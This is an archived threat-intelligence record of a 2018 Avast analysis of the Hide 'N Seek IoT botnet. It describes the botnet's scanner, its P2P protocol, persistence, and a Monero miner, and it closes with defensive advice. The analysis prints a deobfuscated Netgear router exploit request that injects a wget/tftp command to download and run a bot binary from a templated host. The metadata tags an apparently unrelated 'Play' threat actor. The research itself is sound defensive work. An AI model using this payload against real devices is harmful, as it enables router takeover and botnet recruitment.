{
	"id": "6a8d2e3c-a349-4a86-9b80-75ed2721f5b9",
	"created_at": "2026-04-06T00:09:22.728526Z",
	"updated_at": "2026-04-10T13:11:56.045574Z",
	"deleted_at": null,
	"sha1_hash": "cbf7b0d41d7b099fa04b774fe764ca5aed922e35",
	"title": "Let’s play Hide ’N Seek with a botnet.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 82558,
	"plain_text": "Let’s play Hide ’N Seek with a botnet.\r\nBy Threat Intelligence Team 4 Dec 2018\r\nArchived: 2026-04-05 16:41:44 UTC\r\nHide ‘N Seek botnet continues infecting devices with default credentials, building a P2P network and more.\r\nWritten by Adolf Středa and Jan Neduchal\r\nIn late January 2018, a new IoT botnet was reported by Bitdefender[1]. The botnet uses several known vulnerabilities to\r\ninfect new IoT devices and utilizes a home-brewed P2P protocol to facilitate communication across the botnet. While this\r\nbotnet differs in many ways, its infection vectors and techniques are very similar to Mirai’s techniques. And indeed many\r\nparts of the related functions exhibit all signs of a code reuse, as was noted in April 2018 by J. Manuel from Fortinet[3].\r\nThe Hide ‘N Seek botnet has two main functionalities. The first functionality is provided by a scanner module, whose code\r\nseems to be mostly borrowed from the released Mirai source code. This scanner tries to reach several random IP addresses\r\nthrough predefined ports (ports 80, 8080, 2480, 5984, and 23) and then exploits those devices that have these ports open.\r\nUsed exploits are mostly well-known and if any specific strings are used, they are obfuscated by a simple home-brewed\r\ncipher with a hardcoded key. Interestingly, due to the structure of the cipher and a small key-space, the cipher has an\r\ninteresting property - the key ‘self-synchronizes’ to the right value after several characters even if a wrong key was initially\r\nprovided.\r\nGET /setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=wget+http://%J/%T+-O+dgn||tftp+-g+-l+dgn+-\r\nr+%T+%I;chmod+777+dgn;./dgn+a%J+a%J%26%26(echo+jA3;killall+mini_httpd)||echo+ukW\u0026curpath=/tmp\u0026currentsetting.htm\r\nHTTP/1.1\r\nHost: %J\r\nDeobfuscated Netgear router exploit (remote code execution)\r\nIf exploits fail, the scanner will try to brute force credentials with the help of its hard-coded dictionary with more than 250\r\nentries, mostly containing default passwords for various devices. This dictionary consists of 3 blobs of data that is\r\nobfuscated in the same way as other strings in the binary; the only difference is that every entry in the dictionary ends with a\r\nzero-byte that resets the obfuscation key.\r\nThe second functionality facilitates the communication protocol. The protocol is capable of spreading information about\r\nnew peers, distributing new binaries, and propagating files back from an infected device.\r\nP2P protocol\r\nThe Hide ‘N Seek botnet uses a home-brewed protocol that runs over UDP. By default, the bot opens a random port on the\r\nvictim device and adds a firewall rule to allow inbound traffic on the port. The protocol by itself does not use any kind of\r\nauthentication, although some of the data transferred over it is signed, supposedly by the botnet owner.\r\nThe protocol currently supports the following commands:\r\n\u003crandom 5- 16 bytes\u003e\u003cuint8_t checksum\u003e: protocol challenge, ack response expected\r\nO\u003cuint8_t checksum\u003e: acknowledgement (checksum generated from the previous message)\r\nh\u003cuint32_t current_version\u003e: config version request\r\nhttps://blog.avast.com/hide-n-seek-botnet-continues\r\nPage 1 of 5\n\nH\u003cuint32_t offered_version\u003e: config version response\r\nY\u003cuint8_t hash[64]\u003e\u003cuint16_t seq\u003e\u003cuint16_t chunk_index\u003e: send data from file identified by\r\nhash from location at 256 * chunk_index (max. 256 bytes)\r\ny\u003cuint8_t hash[64]\u003e\u003cuint16_t chunk_index\u003e\u003cuint16_t seq\u003e: receive data (ditto)\r\nz\u003cuint32_t ip_address\u003e\u003cuint16_t port\u003e: report a device to be scanned\r\nm\u003cuint8_t hash[64]\u003e\u003cuint32_t ip\u003e\u003cuint16_t port\u003e\u003cuint16_t id\u003e\u003cuint8_t hops\u003e\u003cuint8_t unknown\u003e: send file identified\r\nby hash to ip:port; if the file is not known and hops is positive then broadcast this message to other peers with decremented\r\nhops; it is used to initiate a file transfer\r\n^\u003cuint8_t flag\u003e\u003cuint16_t port\u003e\u003cuint32_t ip_address\u003e: response with a peer’s address/port\r\n~: request an address/port of another peer\r\nBotnet tracker\r\nWe decided to track the botnet’s communication via its rather simplistic P2P protocol. The tracker consists of two parts:\r\nA downloader that tracks the updates of binaries over the botnet’s configuration file\r\nA client that tracks the botnet’s activity and tries to find new peers.\r\nThe tracker itself is available at https://threatlabs.avast.com/botnet, also it should serve as a reference aggregator for any\r\nresearch about Hide ’N Seek we publish.\r\nFile extraction\r\nEach peer has a configuration file with a list of SHA-512 hashes of other files that are available in the botnet, along with\r\ntheir respective file lengths. To retrieve a configuration file from the peer, we need to query the peer for a file with a zero-hash. Using the command “h” we may retrieve its version beforehand. Afterward, retrieving all the files available is just a\r\nmatter of parsing the configuration file and querying contained hashes. Aside from Hide ‘N Seek binaries for various\r\narchitectures, the configuration file also contains hashes of a miner based on an open-source coinminer-opt. Note that the\r\nconfiguration file always contains its ECDSA signature, effectively mitigating botnet poisoning.\r\nTo prevent peer brute forcing, we employ a simple failsafe based on a failure-rate which will stop queries if they are\r\nunsuccessful after a certain number of attempts. Currently, several architectures are supported by this botnet such as x86,\r\nMIPS, and ARM.\r\nPeer exploration\r\nAs the botnet has P2P architecture only, every piece of data necessary for analysis can be obtained through peers. To\r\nestimate the botnet prevalence, we have exploited this property to recursively find new peers, along with mapping the\r\nconnections between them.\r\nUnfortunately, every peer selects a subset of its peer-list (usually 1 or 2 peers) that may be shared with a peer on that day.\r\nBecause of this, we had to expand our peer list over time. It took us a few days for the peer list to reach a total of 1k peers,\r\nand then the list grew linearly adding 1-2k new peers per day. The list of currently active peers is rather small, with\r\napproximately 14% of them active during a 1day sliding window.\r\nLost N’ Found in the tracker\r\nhttps://blog.avast.com/hide-n-seek-botnet-continues\r\nPage 2 of 5\n\nVersion changes\r\nAs noted by various researchers (e.g. [2]), the Hide ‘N Seek botnet has added support for persistence. This is done by\r\ncopying itself to /etc/init.d and also copying itself in newer versions to /etc/rc.d under a filename prefixed with S99, the\r\nhigher the number designates that this file will be launched later during the startup.\r\nThe initial analysis was based on a sample 8cb5cb204eab172befcdd5c923c128dd1016c21aaab72e7b31c0359a48d1357e,\r\nwhen compared to a more recent sample becad1b9d3b67e51404475a0a530b57fd5742f3148f23693c349035dbffddd7. In\r\nterms of exploits, the range was significantly expanded. The former sample contained only two HTTP request-based exploits\r\n(for TP-Link and Netgear devices), while the latest sample expanded attacks to cover more vendors (Cisco) and additional\r\ndevices (Belkin, Avetech IP cameras, HomeMatic IoT device) and as well as exploits against misconfigured databases\r\n(MongoDB and CouchDB).\r\nMiner\r\nIt was reported before [4] that the botnet is also distributing binaries which contain a cryptominer. The miner is based on an\r\nopen-source CPU miner called coinminer-opt (JayDDee/cpuminer-opt). The version distributed over the botnet is configured\r\nto mine Monero cryptocurrency under a mining pool https://moriaxmr.com. Their payment address is:\r\n42T2ZKueiusgZW2Tpu3NZkChLAVqvqTcvgwzfPtxsTPMDgp8morgWMkEE9oqmNsKZcDUVoCdNufs87fCGE2Y62CcJX4DUhc.\r\nWe can actually track their success on the pool’s dashboard:\r\nhide-n-seek-tracker-dashboard\r\nAs of 31.10.2018, it seems botnet owners have made almost 0.9 XMR, which would roughly translate to only $90. Since it\r\nhas been running for several months now and the last payment was made at least 2 months ago, we speculate that this may\r\nhave been a beta-test, possibly serving as a rough estimate of the botnet’s computing power.\r\nWe have two ways of finding this payment address. The first one is to run the sample and look at the TCP communication\r\nfor strings such as:\r\n{\"method\": \"login\",\r\n\"params\": {\"login\":\r\n\"42T2ZKueiusgZW2Tpu3NZkChLAVqvqTcvgwzfPtxsTPMDgp8morgWMkEE9oqmNsKZcDUVoCdNufs87fCGE2Y62CcJX4DUhc.10\r\n\"pass\": \"3a7\",\r\n\"agent\": \"cpuminer-opt/3.8.8\"},\r\n\"id\": 1}\r\nHowever, this assumes that we are able to run the sample which is not trivial for some supported architectures. If we dive\r\ndeeper into the binary, we may notice that the address is obfuscated and could be de-obfuscated with the simple python\r\nscript provided below; note that the initial BL value may vary between binaries.\r\nhide-n-seek-python-code\r\nPython code implementing address deobfuscation yielding address\r\n42T2ZKueiusgZW2Tpu3NZkChLAVqvqTcvgwzfPtxsTPMDgp8morgWMkEE9oqmNsKZcDUVoCdNufs87fCGE2Y62CcJX4DUhc\r\nYe Olde Architecture\r\nThe configuration file seems to support a plethora of various architectures. These architectures were recognized according to\r\ntheir flag (first column) in the ELF binaries.\r\nhttps://blog.avast.com/hide-n-seek-botnet-continues\r\nPage 3 of 5\n\nELF Flag Common architecture name Common platform\r\nEM_MIPS MIPS Routers, IoT\r\nEM_SPARC SPARC Servers\r\nEM_X86_64 x86-64 Mainstream PCs/servers\r\nEM_AARCH64 ARM 64-bit architecture Smartphones, routers, IoT\r\nEM_ARM ARM 32-bit architecture Smartphones, routers, IoT\r\nEM_PPC PowerPC Cisco routers, Apple devices till 2016, PS3\r\nEM_ARC_COMPACT ARC International ARCompact processor Cars, IoT\r\nEM_386 x86 Mainstream PCs/servers\r\nEM_SH SuperH Cars, routers (rare)\r\nWhat shall we draw from this analysis:\r\nWhile the botnet is not new, its objectives are still not clear. So far, only the Monero miner was distributed by the\r\nbotnet with a seemingly limited efficiency.\r\nThe botnet exploits devices with old publicly known vulnerabilities and default passwords.\r\nThe botnet continues to slowly evolve, adding new exploits and functionality (such as persistence).\r\nWhat can we do to protect ourselves:\r\nLimit who can access the device’s administration panel to the local network (i.e. not available via the internet).\r\nKeep your device’s firmware updated.\r\nChange default passwords on your devices and make sure they are strong passwords.\r\nAnalyzed files (SHA-256)\r\nbecad1b9d3b67e51404475a0a530b57fd5742f3148f23693c349035dbffddd7\r\n8cb5cb204eab172befcdd5c923c128dd1016c21aaab72e7b31c0359a48d1357e\r\n6399f9463c74ee687c047e3a7e0149421de423de77ee278ce364b68d22eada00\r\n12ec8c33abae7f0b06533d96f0d820df4ac673e6ff3965a59d982623f4ddc6bb\r\nD87ff51186c4a75ba0fb802abd55a15d263187aefd489a37f505b025ddc1ee66 (miner)\r\n[1] https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/, accessed 20.10.2018\r\n[2] https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/, accessed\r\n20.10.2018\r\n[3] https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html, accessed\r\n20.10.2018\r\nhttps://blog.avast.com/hide-n-seek-botnet-continues\r\nPage 4 of 5\n\n[4] Sendroiu, A. and Diaconescu, V. (2018). Hide’N’Seek: An Adaptive Peer-to-peer IoT Botnet. In: Proceedings of the 28th\r\nVirus Bulletin International Conference. Montreal: Virus Bulletin Ltd, pp.259-264.\r\nAvast is a global leader in cybersecurity, protecting hundreds of millions of users around the world. Protect all of your\r\ndevices with award-winning free antivirus. Safeguard your privacy and encrypt your online connection with SecureLine\r\nVPN. \r\nLearn more about products that protect your digital life at avast.com. And get all the latest news on today's cyberthreats and\r\nhow to beat them at blog.avast.com.\r\nSource: https://blog.avast.com/hide-n-seek-botnet-continues\r\nhttps://blog.avast.com/hide-n-seek-botnet-continues\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.avast.com/hide-n-seek-botnet-continues"
	],
	"report_names": [
		"hide-n-seek-botnet-continues"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434162,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cbf7b0d41d7b099fa04b774fe764ca5aed922e35.pdf",
		"text": "https://archive.orkl.eu/cbf7b0d41d7b099fa04b774fe764ca5aed922e35.txt",
		"img": "https://archive.orkl.eu/cbf7b0d41d7b099fa04b774fe764ca5aed922e35.jpg"
	}
}